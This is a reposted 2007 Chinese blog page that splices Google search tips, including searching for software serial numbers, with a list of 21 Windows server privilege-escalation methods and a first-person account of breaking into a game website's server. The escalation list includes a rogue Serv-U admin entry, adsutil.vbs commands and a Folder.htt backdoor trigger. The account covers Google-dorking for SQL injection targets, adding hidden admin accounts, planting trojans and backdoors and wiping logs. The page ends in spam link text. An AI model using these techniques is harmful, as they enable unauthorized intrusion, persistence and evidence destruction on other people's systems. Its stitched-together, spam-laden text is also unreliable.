    GOOGLE提供了Internet上圖像文件的搜索功能!!目前該功能尚在B測試階段,但已經(jīng)非常好用。訪問地址是“images.google.com”。你可以在關(guān)鍵字欄位內(nèi)輸入描述圖像內(nèi)容的關(guān)鍵字,如“britney spears”,也可以輸入描述圖像質(zhì)量或者其他屬性的關(guān)鍵字,如“high quality”。

    GOOGLE給出的搜索結(jié)果具有一個直觀的縮略圖(THUMBNAIL),以及對該縮略圖的簡單描述,如圖像文件名稱,以及大小等。點擊縮略圖,頁面分成兩禎,上禎是圖像之縮略圖,以及頁面鏈接,而下禎,則是該圖像所處的頁面。屏幕右上角有一個“Remove Frame”的按鈕,可以把框架頁面迅速切換到單禎的結(jié)果頁面,非常方便。GOOGLE還提供了對成人內(nèi)容圖像的限制功能,可以讓搜索者免受不必要的騷擾。

    不過,非常遺憾的是,圖像搜索功能還不支持中文。

    七,搜索技巧雜談

    關(guān)鍵詞的選擇在搜索中起到?jīng)Q定性的作用,所有搜索技巧中,關(guān)鍵詞選擇是最基本也是最有效的。

    例一:查找《鏡花緣》一書中淑士國酒保的酸話原文。

    分析:如果按照一般的思路,找某部小說中的具體段落,就需要用搜索引擎先找到這本書,然后再翻到該段落。這樣做當(dāng)然可以,但是效率很低。如果了解目標(biāo)信息的構(gòu)成,用一些目標(biāo)信息所特有的字詞,可以非常迅速的查到所需要的資料。也就是說,高效率的搜索關(guān)鍵字不一定就是目標(biāo)信息的主題。在上面的例子中,酒保談到酒的濃淡與貴賤的關(guān)系時,之乎者也橫飛。因此,可以用特定的詞語一下子找到目標(biāo)資料。

    搜索:“酒 貴 賤 之”,OK,找到的第一條信息就是鏡花緣的這一段落:“先生聽者:今以酒醋論之,酒價賤之,醋價貴之。因何賤之?為甚貴之?真所分之,在其味之。酒昧淡之,故而賤之;醋味厚之,所以貴之。...”

    以上的關(guān)鍵字選擇技巧可以謂之“特定詞法”。

    例二:“黃花閨女”一詞中“黃花”是什么意思。

    分析:“黃花閨女”是一個約定的俗語,如果只用“黃花閨女 黃花”做關(guān)鍵詞,搜索結(jié)果將浩如煙海,沒什么價值,因此必須要加更多的關(guān)鍵詞,約束搜索結(jié)果。選擇什么關(guān)鍵詞好呢?備選的有“意思”、“含義”、“來歷”、“由來”、“典故”、“出典”、“淵源”等,可以猜到的是,類似的資料,應(yīng)該包含在一些民俗介紹性的文字里,所以用諸如“來歷”、“由來”、“出典”等詞匯的概率更高一些。

    搜索:“黃花閨女 黃花 由來”,查到“黃花”原來出典于《太平御覽》,與南朝的壽陽公主相關(guān)。如果想獲得第一手資料,那就可以用“太平御覽 壽陽公主”做搜索了。

    以上的關(guān)鍵字選擇技巧可以謂之“近義詞法”。

    例三:劉德華同志的胸圍是多少。

    分析:首先聲明,這是某個MM要我做的搜索,我把它作為搜索案例而已,沒其他的意思。非常直接的搜索是,“劉德華 胸圍”,但事實上,這么搜索出來的結(jié)果,盡是一些諸如“劉德華取笑莫文蔚胸圍太小”之類的八卦新聞,無法快速得到所需要的資料。可以想到的是,需要的資料應(yīng)該包含在劉德華的全面介紹性文字中,除了胸圍,應(yīng)該還包括他的身高,體重,生日等一系列相關(guān)信息。OK,這樣就可以進一步的增加其他約束性關(guān)鍵詞以縮小搜索范圍。

    搜索:“劉德華 胸圍 身高”,沒有料到的情況發(fā)生了,網(wǎng)上炙手可熱的痞子蔡《第一次親密接觸》里居然含有這樣關(guān)鍵字,阿泰“改編自劉德華《忘情水》的變態(tài)歪歌”、“用身高體重三圍和生日來加以編號”。好辦,把這部小說去掉,“劉德華 胸圍 身高 -阿泰”,OK,結(jié)果出來了,華仔胸圍84cm。說明一下,為什么用“阿泰”而不用“第一次親密接觸”呢?這是因為小說的名字被轉(zhuǎn)載的時候可能有變動,但里面角色的名字是不會變的。

    以上的關(guān)鍵字選擇技巧可以謂之“相關(guān)詞法”。

    其他常用搜索個案

    例一:找人

    分析:一個人在網(wǎng)上揭示的資料通常有:姓名,網(wǎng)名,性別,年齡,畢業(yè)學(xué)校,工作單位,外號,住址,電話,信箱,BP,手機號碼,ICQ號,OICQ號等等。所以,如果你要了解一下你多年沒見過的同學(xué),那不妨用上述信息做關(guān)鍵字進行查詢,也許會有大的收獲。

    例二:找軟件

    分析一:最簡單的搜索當(dāng)然就是直接以軟件名稱以及版本號為關(guān)鍵字查詢。但是,僅僅有軟件名稱和目標(biāo)網(wǎng)站,顯然還不行,因為搜索到的可能是軟件的相關(guān)新聞。應(yīng)該再增加一個關(guān)鍵字。考慮到下載頁面上常有“點擊此處下載”或者“download”的提示語,因此,可以增加“下載”或者“download”為關(guān)鍵字。
    搜索:“winzip 8.0 下載”
    結(jié)果:已搜索有關(guān)winzip 8.0 下載的中文(簡體)網(wǎng)頁。共約有6,670項查詢結(jié)果,這是第1-10項。搜索用時0.22秒。

    分析二:很多網(wǎng)站設(shè)有專門的下載目錄,而且就命名為“download”,因此,可以用INURL語法直接搜索這些下載目錄。
    搜索:“winzip 8.0 inurl:download”
    結(jié)果:已搜索有關(guān)winzip 8.0 inurl:download的中文(簡體)網(wǎng)頁。共約有358項查詢結(jié)果,這是第1-10項。搜索用時0.44秒。

    在互聯(lián)網(wǎng)上隨意的下載軟件是不安全的,因為供下載的軟件有可能帶有病毒或者捆綁了木馬,所以,對下載網(wǎng)站作一個限定,是一個穩(wěn)妥的思路。可以用SITE語法達到這個目的。

    共享軟件下載完之后,使用的時候,軟件總跳出警示框,或者軟件的功能受到一定限制。由于中國的網(wǎng)民多是窮棒子,所以應(yīng)該再找一個注冊碼。找注冊碼,除了軟件的名稱和版本號外,還需要有諸如“serial number”、“sn”、“序列號”等關(guān)鍵字。現(xiàn)在,來搜索一下winzip8.0的注冊碼。
    搜索:“winzip 8.0 sn”
    結(jié)果:已向英特網(wǎng)搜索winzip 8.0 sn. 共約有777項查詢結(jié)果,這是第1-10項。搜索用時0.30秒。

    例三:找圖片

    除了GOOGLE提供的專門圖片搜索功能,還可以組合使用一些搜索語法,達到圖片搜索之目的。

    分析一:專門的圖片集合,提供圖片的網(wǎng)站通常會把圖片放在某個專門目錄下,如“gallary”、“album”、“photo”、“image”等。這樣就可以使用INURL語法迅速找到這類目錄。現(xiàn)在,試著找找小甜甜布蘭妮的照片集。
    搜索:“"britney spears" inurl:photo”
    結(jié)果:已向英特網(wǎng)搜索"britney spears" inurl:photo. 共約有2,720項查詢結(jié)果,這是第1-10項。搜索用時0.23秒。

    分析二:提供圖片集合的網(wǎng)頁,在標(biāo)題欄內(nèi)通常會注明,這是誰誰的圖片集合。于是就可以用INTITLE語法找到這類網(wǎng)頁。
    搜索:“intitle:"britney spears" picture”
    結(jié)果:已向英特網(wǎng)搜索intitle:"britney spears" picture. 共約有317項查詢結(jié)果,這是第1-10項。搜索用時0.40秒。

    分析三:明星的FANS通常會申請免費個人主頁來存放他們偶像的靚照。于是用SITE語法指定某免費主頁提供站點,是個迅速找到圖片的好辦法。
    搜索:“"britney spears" site:geocities.com”
    結(jié)果:已在geocities.com內(nèi)搜索有關(guān)"britney spears"的網(wǎng)頁。共約有5,020項查詢結(jié)果,這是第1-10項。搜索用時0.47秒。

    例四:找MP3

    分析一:提供MP3的網(wǎng)站,通常會建立一個叫做MP3的目錄,目錄底下分門別類的存放各種MP3樂曲。所以,可以用INURL語法迅速找到這類目錄。現(xiàn)在用這個辦法找找老歌“say you say me”。
    搜索:“"say you say me" inurl:mp3”
    結(jié)果:已向英特網(wǎng)搜索inurl:mp3 "say you say me". 共約有155項查詢結(jié)果,這是第1-10項。搜索用時0.17秒。

    分析二:也可以通過網(wǎng)頁標(biāo)題,找到這類提供MP3的網(wǎng)頁。
    搜索:“"say you say me" intitle:mp3”
    結(jié)果:已向英特網(wǎng)搜索"say you say me" intitle:mp3. 共約有178項查詢結(jié)果,這是第1-10項。搜索用時0.73秒。

    當(dāng)然,如果你知道某個網(wǎng)站的下載速度快,而且樂曲全,就可以用SITE語法先到該網(wǎng)站上看看有沒有目標(biāo)樂曲。

    例五:找書

    分析一:對我而言,常訪問的電子圖書館類網(wǎng)站就那么幾個,比如文藝類的“www.shuku.net”。于是可以用SITE語法很簡單的找到某本書(如果該網(wǎng)站上有的話)。比如,“舊唐書 site:shuku.net”,就可以馬上找到該書。如果沒有,通常別的網(wǎng)站上也很難找到。因此,找書的關(guān)鍵,是你了解一大批著名的圖書館網(wǎng)站。

    分析二:我上面介紹的第一項關(guān)鍵字選擇技巧特定詞法,對于迅速找到某書或者文章也是極其有用的,當(dāng)然,這得建立在你已經(jīng)讀過該書,對書的內(nèi)容有印象的基礎(chǔ)上。比如如果了解堂吉訶德一書戰(zhàn)風(fēng)車的大致內(nèi)容,就可以用“吉訶德 風(fēng)車 桑喬”迅速找到該書。

    九,GOOGLE搜索FAQ

    Q:如何全面的了解google.com?
    A:查看網(wǎng)站相關(guān)頁面“http://www.google.com/about.html”。

    Q:如何切換google.com的初始語言界面?
    A:點擊搜索欄右邊的“使用偏好”(Preferences),選擇“界面語言”(Interface Language)中你期望的語言,點擊最下面的“設(shè)定使用偏好”(Save Preferences)按鈕。需要提醒的是,GOOGLE用cookie記錄這個偏好,所以如果你把瀏覽器的cookie功能關(guān)掉,就無法進行設(shè)定。

    Q:如何設(shè)定每頁搜索結(jié)果顯示數(shù)量?
    A:同上,進入使用偏好,在該頁的“查看結(jié)果”(Number of Results)選擇顯示結(jié)果數(shù),數(shù)目越大,顯示結(jié)果需要的時間越長,默認(rèn)是10項。

    Q:搜索到的鏈接無法打開怎么辦?
    A:鏈接無法打開的原因很多,比如網(wǎng)站當(dāng)機,或者ISP過濾等,可以點擊GOOGLE的“網(wǎng)頁快照”查看在GOOGLE服務(wù)器上的網(wǎng)頁緩存。

    Q:打開搜索結(jié)果的鏈接,可是該頁面太大,很難找到一下子找到目的資料怎么辦?
    A:直接打開“網(wǎng)頁快照”,GOOGLE會把關(guān)鍵詞用不同顏色標(biāo)記出來,很容易找到。

    第六部分
    21種RING的提權(quán)方法
    好多都沒有成功,還是發(fā)來看看,看看思路,呵呵

    以下全部是本人提權(quán)時候的總結(jié) 很多方法至今沒有機會試驗也沒有成功,但是我是的確看見別人成功過的。本人不才,除了第一種方法自己研究的,其他的都是別人的經(jīng)驗總結(jié)。希望對朋友有幫助!

    1.radmin連接法

    條件是你權(quán)限夠大,對方連防火墻也沒有。封裝個radmin上去,運行,開對方端口,然后radmin上去。本人從來米成功過。,端口到是給對方打開了。

    2.paanywhere

    C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 這里下他的GIF文件,在本地安裝pcanywhere上去

    3.SAM破解

    C:\WINNT\system32\config\ 下他的SAM 破解之

    4.SU密碼奪取

    C:\Documents and Settings\All Users\「開始」菜單\程序\

    引用:Serv-U,然后本地查看屬性,知道路徑后,看能否跳轉(zhuǎn)
        進去后,如果有權(quán)限修改ServUDaemon.ini,加個用戶上去,密碼為空
    [USER=WekweN|1]
    Password=
    HomeDir=c:\
    TimeOut=600
    Maintenance=System
    Access1=C:\|RWAMELCDP
    Access1=d:\|RWAMELCDP
    Access1=f:\|RWAMELCDP
    SKEYValues=
        這個用戶具有最高權(quán)限,然后我們就可以ftp上去 quote site exec xxx 來提升權(quán)限

    5.c:\winnt\system32\inetsrv\data\

    引用:就是這個目錄,同樣是erveryone 完全控制,我們所要做的就是把提升權(quán)限的工具上傳上去,然后執(zhí)行

    6.SU溢出提權(quán)

    這個網(wǎng)上教程N多 不詳細(xì)講解了

    7.運行Csript

    引用:運行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提升權(quán)限
    用這個cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
    查看有特權(quán)的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
    再將asp.dll加入特權(quán)一族
    asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的機子放的位置不一定一樣)
    我們現(xiàn)在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"
    可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去了

    8.腳本提權(quán)

    c:\Documents and Settings\All Users\「開始」菜單\程序\啟動"寫入bat,vbs

    9.VNC

    這個是小花的文章 HOHO

    默認(rèn)情況下VNC密碼存放在HKCU\Software\ORL\WinVNC3\Password

    我們可以用vncx4

    破解它,vncx4使用很簡單,只要在命令行下輸入

    c:\>vncx4 -W

    然后順序輸入上面的每一個十六進制數(shù)據(jù),沒輸完一個回車一次就行了。

    10.NC提權(quán)

    給對方來個NC 但是條件是你要有足夠的運行權(quán)限 然后把它反彈到自己的電腦上 HOHO OK了

    11.社會工程學(xué)之GUEST提權(quán)
    很簡單 查看他的擁護 一般來說 看到帳戶以后 密碼盡量猜 可能用戶密碼一樣 也可能是他QQ號 郵箱號 手機號 盡量看看 HOHO

    12.IPC空連接

    如果對方真比較白癡的話 掃他的IPC 如果運氣好還是弱口令

    13.替換服務(wù)

    這個不用說了吧?個人感覺相當(dāng)復(fù)雜

    14.autorun .inf

    autorun=xxx.exe 這個=后面自己寫 HOHO 加上只讀、系統(tǒng)、隱藏屬性 傳到哪個盤都可以的 不相信他不運行

    15.desktop.ini與Folder.htt

    引用:首先,我們現(xiàn)在本地建立一個文件夾,名字不重要,進入它,在空白處點右鍵,選擇“自定義文件夾”(xp好像是不行的)一直下點,默認(rèn)即可。完成后,你就會看到在此目錄下多了兩個名為Folder setting的文件架與desktop.ini的文件,(如果你看不到,先取消“隱藏受保護的操作系統(tǒng)文件”)然后我們在Folder setting目錄下找到Folder.htt文件,記事本打開,在任意地方加入以下代碼: <OBJECT ID=”RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=”你的后門文件名”> </OBJECT> 然后你將你的后門文件放在Folder setting目錄下,把此目錄與desktop.ini一起上傳到對方任意一個目錄下,就可以了,只要等管理員瀏覽了此目錄,它就執(zhí)行了我們的后門

    16.su覆蓋提權(quán)

    本地安裝個su,將你自己的ServUDaemon.ini文件用從他那下載下來的ServUDaemon.ini 覆蓋掉,重起一下Serv-U,于是你上面的所有配置都與他的一模一樣了

    17.SU轉(zhuǎn)發(fā)端口

    43958這個是 Serv -U 的本地管理端口。FPIPE.exe上傳他,執(zhí)行命令: Fpipe –v –l 3333 –r 43958 127.0.0.1 意思是將3333端口映射到43958端口上。 然后就可以在本地安裝一個Serv-u,新建一個服務(wù)器,IP填對方IP,帳號為LocalAdministrator 密碼為#1@$ak#.1k;0@p 連接上后你就可以管理他的Serv-u了

    18.SQL帳戶密碼泄露

    如果對方開了MSSQL服務(wù)器,我們就可以通過用SQL連接器加管理員帳號(可以從他的連接數(shù)據(jù)庫的ASP文件中看到),因為MSSQL是默認(rèn)的SYSTEM權(quán)限。

    引用:對方?jīng)]有刪除xp_cmdshell 方法:使用Sqlexec.exe,在host 一欄中填入對方IP,User與Pass中填入你所得到的用戶名與密碼。format選擇xp_cmdshell”%s”即可。然后點擊connect,連接上后就可以在CMD一欄中輸入你想要的CMD命令了

    19.asp.dll

    引用:因為asp.dll是放在c:\winnt\system32\inetsrv\asp.dll   (不同的機子放的位置不一定相同)
    我們現(xiàn)在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"
    好了,現(xiàn)在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去
    了,注意,用法中的get和set,一個是查看一個是設(shè)置.還有就是你運行上面的你要到C:\Inetpub\AdminScripts>這個目錄下.
    那么如果你是一個管理員,你的機子被人用這招把asp提升為system權(quán)限,那么,這時,防的方法就是把asp.dll T出特權(quán)一族,也就是用set這個命令,覆蓋掉剛才的那些東東.

    20.Magic Winmail

    前提是你要有個webshell 引用:http://www.eviloctal.com/forum/read.php?tid=3587這里去看吧

    21.DBO……

    其實 提升權(quán)限的方式很多的 就看大家怎么利用了 HOHO 加油吧 將服務(wù)器控制到底

    第七部分
    菜鳥+Sa+注入工具組合=肉雞成群

    現(xiàn)在,注入漏洞異常火爆,不少黑友都利用該漏洞過了一把黑客癮,并擁有了不少自己的肉雞。不過對于小菜們來說,注入入侵也并不是那么一帆風(fēng)順,尤其是在注入點的尋找以及獲得WebShell后的提升權(quán)限問題上。在這里,我給廣大初學(xué)注入入侵的小菜們提供一種快速獲取sa權(quán)限注入點入侵目標(biāo)主機的辦法。高手可以跳過本文,或者就當(dāng)是復(fù)習(xí)吧。
    獲取注入點的方法不外乎兩種:手工尋找和利用注入工具尋找。對于前者,多數(shù)是用搜索引擎來找特定的網(wǎng)址(形如xxx.asp?xxid=),對于后者,則是針對具體某個站點用注入工具掃描注入點。不過,你有沒有考慮過把這兩種方法結(jié)合起來使用呢?我就傾向于二者的組合使用,方法如下:
    在阿D注入工具中的“掃描注入點”功能模塊的地址欄里輸入并轉(zhuǎn)到google的網(wǎng)址,選擇“高級搜索”,在搜索結(jié)果欄中選擇“100項結(jié)果”,語言選擇“簡體中文”,關(guān)鍵字填:xxx inurl:asp或是inurl:XX.asp?id=、inurl:xxx.asp?xxid等,這些都是我們常見的可能存在注入點的網(wǎng)址形式,我輸入的是ert inurl:asp(有人說這個關(guān)鍵字容易找到sa權(quán)限,不知是真是假,但我確實找到了不少)。點擊搜索后,在注入點一欄中馬上就會顯示出N多的有注入點的網(wǎng)址。
    在第一頁中就顯示找到了20幾個(20%),從頭開始試,檢測一下,是不是sa權(quán)限,若不是可先跳過。因為本文講的是sa權(quán)限,所以在這里我們只找有sa權(quán)限注入點的網(wǎng)站,以省去菜鳥們在注入時因一些權(quán)限問題而導(dǎo)致入侵卡住的情況。也許有人要問了,有那么多sa權(quán)限注入點的網(wǎng)站嗎?根據(jù)我的個人經(jīng)驗,只要你的關(guān)鍵字設(shè)的好,每100項中就有20幾個(約20%)有注入漏洞的網(wǎng)站,在這些網(wǎng)站中又有5個左右(約5%)是有sa權(quán)限的。試想想,只要我們的關(guān)鍵字設(shè)的好,google可以搜索到的結(jié)果何止是100項,一般的搜索結(jié)果都在1萬項以上,這樣算來,我們的目標(biāo)就有成百上千呀(小菜高呼:哇!發(fā)財了!),就怕你沒有那么多的精力去注入全部的網(wǎng)站,呵呵!我馬上就找到了一個(運氣好呀,可以去買票了,說不定是頭獎呢?呵呵,又一個百萬富翁!什么?現(xiàn)在百萬富翁不算啥?要不,你給我一百萬?!)。將這個網(wǎng)址復(fù)制到明小子的domain3.2中進行檢測,也確實是sa權(quán)限,跟阿D注入工具顯示的一樣。
    用domain的命令行功能查看一下開放的端口,發(fā)現(xiàn)開放了21、23、80、1433、3389等端口,看來我今天運氣的確不錯呀!加個賬號admin$,但由于管理員已經(jīng)遠(yuǎn)程登錄3389。
    看來我暫時不要登錄的為好。再看看有沒有其它可以利用的東西,用阿D注入工具的目錄瀏覽功能看了一下(個人感覺這方面阿D注入工具要比domain好!明小子怒目圓睜,大叫:你收了阿D多少好處!)忽然眼睛一亮,發(fā)現(xiàn)D盤有一個wwwroot目錄,并且里面有一個目錄和網(wǎng)站名一樣。
    呵呵,好東西呀,向里面寫入個asp木馬試試,瀏覽文件也好方便一些。但接下來讓我郁悶的是明明提示已經(jīng)上傳成功。
    但在瀏覽器中輸入它的地址卻提示沒有該文件,而且到了后來,domain的命令行功能反饋回來的信息也變得非常凌亂,不知道是怎么回事。于是想換個cmdshell,又想起它開了23端口,用telnet連接了一下,發(fā)現(xiàn)有ntlm認(rèn)證。呵呵,老辦法,在本地新建一個admin$賬號,密碼和目標(biāo)主機上的一樣,再用這個賬號運行cmd.exe,telnet到目標(biāo)主機——連接成功,用query user查看了一下終端情況,發(fā)現(xiàn)有一個會話處于斷開狀態(tài),于是我便用3389連接了一下,卻提示3389已經(jīng)達到了最大連接數(shù)!我暈,看來有連接數(shù)限制,干脆把這個會話結(jié)束掉,反正它也斷開了,浪費資源!呵呵,輸入logoff 2(它的會話ID),然后用3389登錄試試,登錄成功。
    本想入侵到這里就結(jié)束的,但看了一下這臺主機的配置:P4 3.0,512M內(nèi)存,我就不禁流口水了,這樣的主機放過了就可惜了,是極品呀,于是就又有了下文的一些曲折!
    用3389進來后,本想在上面安裝Radmin,但發(fā)現(xiàn)程序菜單里已經(jīng)有了,看來是管理員遠(yuǎn)程控制用的,此路顯然是不通了。突然想起Radmin的密碼文件是存在注冊表里的,雖然是加了密的,但現(xiàn)在已經(jīng)有了Radmin密碼的暴力破解工具,把它在注冊表中的密碼鍵值讀取出來保存到一個臨時文件。
    然后編輯這個文件,直接通過3389復(fù)制粘貼到本地,用破解軟件跑了半天,沒有結(jié)果,看來管理員設(shè)的Radmin密碼也不弱智呀!
    算了,再找別的思路吧!在上面裝個rmtsvc?這也是遠(yuǎn)程控制軟件中的精品呀!怎么上傳呢,在本地開個FTP,然后通過3389打開一個cmd進行登錄,發(fā)現(xiàn)半天沒有反應(yīng),它上面有Serv-U,加個賬號再在本地連接試試,也是沒反應(yīng)!畢竟是個人氣還挺旺的游戲網(wǎng)站嘛,連接的人太多,看來是網(wǎng)速受影響了!沒辦法,前面不是有個1433端口開放了嗎?呵呵,不是還知道它的網(wǎng)站文件所在的目錄了嗎?找數(shù)據(jù)庫連接文件唄——地球人都知道!我找呀找呀找呀找,找到一個好朋友:connin.asp,打開看了看,密碼就乖乖地躺在里面呢。
    馬上用SQLTools連接上,發(fā)現(xiàn)一點擊上傳文件后,也是就卡住了,看來網(wǎng)速的確是受影響了,總不能為了讓網(wǎng)絡(luò)流量小一點,就讓我把目標(biāo)主機強行重啟吧?我可是有點怕怕呀,呵呵!怎么辦呢?
    正當(dāng)無奈之際,突然看到了桌面上的IE瀏覽器,于是靈光一閃,真是山重水復(fù)疑無路,柳暗花明又一村,終于找到救星了!馬上用它從網(wǎng)上下載了一個rmtsvc裝上。呵呵,終于成功安裝!整了半天,我咋就沒想到利用IE直接上網(wǎng)去下載呢?
    到這,我已經(jīng)完全控制了這臺主機。不過,為了保險起見,通過3389,我把海洋2006木馬的代碼復(fù)制過去,保存在網(wǎng)站目錄下,并且,我發(fā)現(xiàn)該網(wǎng)站有Dvbbs論壇,于是我用前面找到的數(shù)據(jù)庫連接密碼,用MSSQL Server的查詢分析器連上去,讀取出后臺管理密碼,可惜是經(jīng)過加密了的,有總比沒有好。
    然后克隆IIS的默認(rèn)賬號為管理員。這樣,就安全多了,呵呵,萬一肉雞丟了,還可以再找回來。由于在上面操作過程中下載過東西,把IE的記錄全刪掉,同時處理一下日志,閃人!


    總結(jié):
    1.剛開始學(xué)注入的小菜們,大多是通過搜索引擎漫無邊際地找注入點,比較費力!本文的阿D注入工具配合Google搜索引擎批量找注入點可以節(jié)省不少的時間,而且也很容易找到有sa權(quán)限注入點的網(wǎng)站,畢竟搜索引擎找到的結(jié)果數(shù)量還是相當(dāng)驚人的,不過在查找關(guān)鍵字上就要多總結(jié)技巧,從而最大限度的找到更多的有sa權(quán)限注入點的網(wǎng)站!當(dāng)然,我們也可以用domain來批量檢測,不過個人感覺相比阿D注入工具,Domain找到的注入網(wǎng)站要少一點,而且列目錄功能也沒有阿D注入工具好用。不過,對于命令行功能domain就要略勝一籌了,也可能是我用的阿D注入工具的破解問題或是版本問題                                                                                                                                                                                                                                                                                                                                                                                                                                                                  吧。因此,在這里,我推薦大家把這兩款工具結(jié)合起來使用,取二者的長處:通過搜索引擎找有注入點的網(wǎng)站和列目錄功能用阿D的注入工具,執(zhí)行命令功能用domain,這樣的工具組合,更能提高我們的入侵效率!
    2.對于上傳文件不一定局限于在本地和目標(biāo)主機之間傳輸文件,也可以在目標(biāo)主機上直接從網(wǎng)上下載文件。像我本文后半部分的入侵就是。
    3.最后,盡量在肉雞上多放兩個后門,以便肉雞丟失后找回肉雞之用。
    4.對于入侵,最重要的是思路,一個思路不行時,要學(xué)會從多方面考慮,這樣我們的黑客技術(shù)才能提高!
    5.在找到注入點后,不要習(xí)慣性地先去找后臺密碼,再用后臺密碼登錄上傳WebShell去提升權(quán)限,要先看看是不是sa權(quán)限,因為如果是sa權(quán)限的話,我們的權(quán)限是很高的,要先試試能不能執(zhí)行系統(tǒng)級命令如添加管理員賬號、開telnet服務(wù)等,同時要注意它的3389服務(wù)是不是已經(jīng)開放。從而避免一些不必要的彎路。
    最后,希望小菜們能通過本文有所啟示,也祝愿廣大黑友們?nèi)怆u多多!更希望國內(nèi)的網(wǎng)站管理員們多關(guān)注一下網(wǎng)絡(luò)安全!

    轉(zhuǎn)載。。。。。。。。。。。。。。。。。。。。

    posted on 2007-07-27 09:34 朱巖 閱讀(383) 評論(0)  編輯  收藏 所屬分類: 其他文章


    只有注冊用戶登錄后才能發(fā)表評論。


    網(wǎng)站導(dǎo)航:
     
    主站蜘蛛池模板: 女人18毛片水真多免费看| 99在线视频免费观看| 亚洲色大成网站www久久九| 亚洲三级中文字幕| 亚洲人成影院在线高清| 国产免费看JIZZ视频| 一区二区三区精品高清视频免费在线播放 | a级毛片免费观看在线| 特级av毛片免费观看| 色网站在线免费观看| 亚洲乱码一二三四区麻豆| 亚洲精品无码久久久久去q| 性感美女视频在线观看免费精品| A片在线免费观看| 亚洲av无码成人精品国产| 亚洲精品女同中文字幕| 日本亚洲中午字幕乱码| 亚洲伊人久久大香线蕉| 亚洲精品无码日韩国产不卡av| 久久综合亚洲色HEZYO社区 | 免费毛片毛片网址| 日日狠狠久久偷偷色综合免费| 久久精品国产亚洲AV蜜臀色欲| 亚洲高清国产AV拍精品青青草原| 免费a级黄色毛片| 久久久久亚洲精品无码网址 | 久久免费99精品国产自在现线 | 亚洲Av综合色区无码专区桃色 | 丁香花在线观看免费观看 | 亚洲性一级理论片在线观看| www.亚洲日本| 国产成人亚洲精品91专区高清| 亚洲人成人无码.www石榴 | 卡1卡2卡3卡4卡5免费视频| 中文字幕人成无码免费视频 | 亚洲专区一路线二| 国产亚洲综合一区二区三区| 手机看片国产免费永久| 性生交片免费无码看人| 亚洲精品国精品久久99热| 亚洲成a人片77777老司机|